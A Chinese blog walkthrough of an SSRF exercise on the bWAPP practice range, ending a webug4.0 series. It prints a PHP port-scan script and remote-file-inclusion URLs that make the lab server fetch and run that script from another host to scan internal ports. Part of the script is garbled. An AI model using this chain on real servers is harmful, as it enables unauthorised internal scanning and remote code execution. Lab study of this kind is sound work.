webug4.0-ssrf

0x01 相关知识

1.什么是ssrf?

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是要目标网站的内部系统。(因为他是从内部系统访问的,所有可以通过它攻击外网无法访问的内部系统,也就是把目标网站当中间人)

2.ssrf形成的原因是什么?

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,文档,等等。

参考:https://www.jianshu.com/p/d1d1c40f6d4c

0x02 漏洞利用

1.点开页面

好吧,可能是未完善。

2.我们使用另一个靶场bwapp来完成我们的收官之战。

3.点开页面 使用bee-box账号-密码 选择难度low 登陆

4.选择ssrf 然后点击hack

webug4.0-ssrf_第1张图片

5. 会发现他列出了3个实验,每个实验列出了一份写好的攻击脚本:

webug4.0-ssrf_第2张图片

6.Port scan脚本如下: 保存为ssrf-1.txt

alert(\"U 4r3 0wn3d by MME!!!\");";

if(isset($_REQUEST["ip"]))
{
    
    //list of port numbers to scan
    $ports = array(21, 22, 23, 25, 53, 80, 110, 1433, 3306);
    
    $results = array();
    
    foreach($ports as $port)
    {

        if($pf = @fsockopen($_REQUEST["ip"], $port, $err, $err_string, 1))
        {

            $results[$port] = true;
            fclose($pf);
            
        }
        
        else
        {

            $results[$port] = false;        

        }

    }
 
    foreach($results as $port=>$val)
    {

        $prot = getservbyport($port,"tcp");
        echo "Port $port ($prot): ";

        if($val)
        {

            echo "OK
"; } else { echo "Inaccessible
"; } } } ?>

7.点开RFI(远程文件包含)漏洞场景:

webug4.0-ssrf_第3张图片

8. 出现这个页面:

9.我们选择语言,点击go:  发现一个"异常"的url:

http://localhost/bWAPP/rlfi.php?language=lang_en.php&action=go

10.根据我们以前的远程文件包含经验,我们直接替换lang_en.php为我们写好的脚本(即上面的portscan脚本):

http://localhost/bWAPP/rlfi.php?language=http://192.168.72.1/ssrf-1.txt&action=go

webug4.0-ssrf_第4张图片

ok能够执行成功 远程验证一下。

11.使用post方法设定内网ip地址 进行端口扫描

http://192.168.72.135/bWAPP/rlfi.php?language=http://192.168.72.1/ssrf-1.txt&action=go

 

webug4.0-ssrf_第5张图片

12.成功:

webug4.0-ssrf_第6张图片

13.ok,本次实验到此结束 ,如果有兴趣做后面的两个实验,可以自行下载bwapp靶场。

0x03 结语

   webug4.0完结

你可能感兴趣的:(WEBUG4.0通关)